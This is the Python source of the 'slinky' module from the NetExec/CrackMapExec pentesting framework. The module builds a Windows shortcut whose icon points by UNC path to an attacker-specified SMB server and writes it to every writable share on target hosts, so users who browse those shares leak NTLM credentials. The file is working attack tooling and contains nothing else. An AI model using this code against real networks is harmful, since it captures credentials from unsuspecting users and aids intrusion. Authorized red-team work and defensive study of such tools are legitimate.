NetExec/cme/modules/slinky.py

import pylnk3
import os
import ntpath
from sys import exit

class CMEModule:
    '''
        Original idea and PoC by Justin Angel (@4rch4ngel86)
        Module by @byt3bl33d3r
    '''

    name = 'slinky'
    description = 'Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions'
    supported_protocols = ['smb']
    opsec_safe= False
    multiple_hosts = True

    def options(self, context, module_options):
        '''
        SERVER        IP of the SMB server
        NAME          LNK file name
        CLEANUP       Cleanup (choices: True or False)
        '''

        self.cleanup = False

        if 'CLEANUP' in module_options:
            self.cleanup = bool(module_options['CLEANUP'])

        if 'NAME' not in module_options:
            context.log.error('NAME option is required!')
            exit(1)

        if not self.cleanup and 'SERVER' not in module_options:
            context.log.error('SERVER option is required!')
            exit(1)

        self.lnk_name   = module_options['NAME']
        self.lnk_path  = '/tmp/{}.lnk'.format(self.lnk_name)
        self.file_path = ntpath.join('\\', '{}.lnk'.format(self.lnk_name))

        if not self.cleanup:
            self.server = module_options['SERVER']
            link = pylnk3.create(self.lnk_path)
            link.icon = '\\\\{}\\icons\\icon.ico'.format(self.server)
            link.save()

    def on_login(self, context, connection):
        shares = connection.shares()
        for share in shares:
            if 'WRITE' in share['access'] and share['name'] not in ['C$', 'ADMIN$']:
                context.log.success('Found writable share: {}'.format(share['name']))
                if not self.cleanup:
                    with open(self.lnk_path, 'rb') as lnk:
                        try:
                            connection.conn.putFile(share['name'], self.file_path, lnk.read)
                            context.log.success('Created LNK file on the {} share'.format(share['name']))
                        except Exception as e:
                            context.log.error('Error writing LNK file to share {}: {}'.format(share['name'], e))
                else:
                    try:
                        connection.conn.deleteFile(share['name'], self.file_path)
                        context.log.success('Deleted LNK file on the {} share'.format(share['name']))
                    except Exception as e:
                        context.log.error('Error deleting LNK file on share {}: {}'.format(share['name'], e))